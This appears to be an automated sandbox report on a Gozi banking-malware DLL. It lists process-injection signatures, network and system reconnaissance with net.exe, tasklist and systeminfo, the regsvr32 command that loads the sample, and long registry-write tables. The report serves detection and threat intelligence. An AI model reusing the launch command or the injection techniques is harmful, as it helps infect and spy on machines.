Analysis Overview
SHA256
9ec85fa9097826fce61020be2f15ed01c320109c7ec3654c2a42b1b5c46b4b6f
Threat Level: Known bad
The file aa856dedda137f7419ecc36766ed74e3 was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Gathers system information
Modifies registry class
Runs net.exe
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Discovers systems in the same network
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-03 16:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-03 16:02
Reported
2022-08-03 16:05
Platform
win7-20220715-en
Max time kernel
39s
Max time network
44s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll
Network
Files
memory/2024-54-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmp
memory/1092-55-0x0000000000000000-mapping.dmp
memory/1092-56-0x0000000075B81000-0x0000000075B83000-memory.dmp
memory/1092-57-0x0000000010000000-0x000000001000E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-03 16:02
Reported
2022-08-03 16:05
Platform
win10v2004-20220721-en
Max time kernel
151s
Max time network
138s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4380 set thread context of 3116 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 3116 set thread context of 3576 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3116 set thread context of 3828 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3116 set thread context of 4552 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3116 set thread context of 1740 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000000e22218463a7d801383b808763a7d801383b808763a7d801bd5905000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000323236663639386464356465663165353366313438383361363164643230303061323538316165653735373635613466333161396163376431393863313437340000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000df799600320032003600660036003900380064006400350064006500660031006500350033006600310034003800380033006100360031006400640032003000300030006100320035003800310061006500650037003500370036003500610034006600330031006100390061006300370064003100390038006300310034003700340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32323666363938646435646566316535336631343838336136316464323030306132353831616565373537363561346633316139616337643139386331343734000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a430370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a430370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000218ce28163a7d801218ce28163a7d801218ce28163a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000323236663639386464356465663165353366313438383361363164643230303061323538316165653735373635613466333161396163376431393863313437340000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000df799600320032003600660036003900380064006400350064006500660031006500350033006600310034003800380033006100360031006400640032003000300030006100320035003800310061006500650037003500370036003500610034006600330031006100390061006300370064003100390038006300310034003700340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32323666363938646435646566316535336631343838336136316464323030306132353831616565373537363561346633316139616337643139386331343734000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3a0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3a0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = a3b25a8b63a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008381428463a7d801864ea18a63a7d801864ea18a63a7d801401319000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000313937626664663938623930663135363830343766353339303231353937643331376564303261373266646130333532636237383736343431333435383737300000b20009000400efbe03559690035596902e000000000000000000000000000000000000000000000000002b195600310039003700620066006400660039003800620039003000660031003500360038003000340037006600350033003900300032003100350039003700640033003100370065006400300032006100370032006600640061003000330035003200630062003700380037003600340034003100330034003500380037003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31393762666466393862393066313536383034376635333930323135393764333137656430326137326664613033353263623738373634343133343538373730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a450370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a450370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = b1abff8163a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000079d9f08163a7d80179d9f08163a7d80179d9f08163a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000613439323131633833616662313164653134323636363662376332343139373263623334643939373135643633353837396136646363373333316161323939610000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000872c8800610034003900320031003100630038003300610066006200310031006400650031003400320036003600360036006200370063003200340031003900370032006300620033003400640039003900370031003500640036003300350038003700390061003600640063006300370033003300310061006100320039003900610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61343932313163383361666231316465313432363636366237633234313937326362333464393937313564363335383739613664636337333331616132393961000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3c0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3c0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\197bfdf98b90f1568047f539021597d317ed02a72fda0352cb78764413458770" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = 7fdf2f8263a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = cf34488b63a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c0eb29be-1c77-40e1- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc7c23c5-8053-49d2- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a49211c83afb11de1426666b7c241972cb34d99715d635879a6dcc7331aa299a" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f64f1dc4-a930-4385- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- | C:\Windows\System32\RuntimeBroker.exe | N/A |
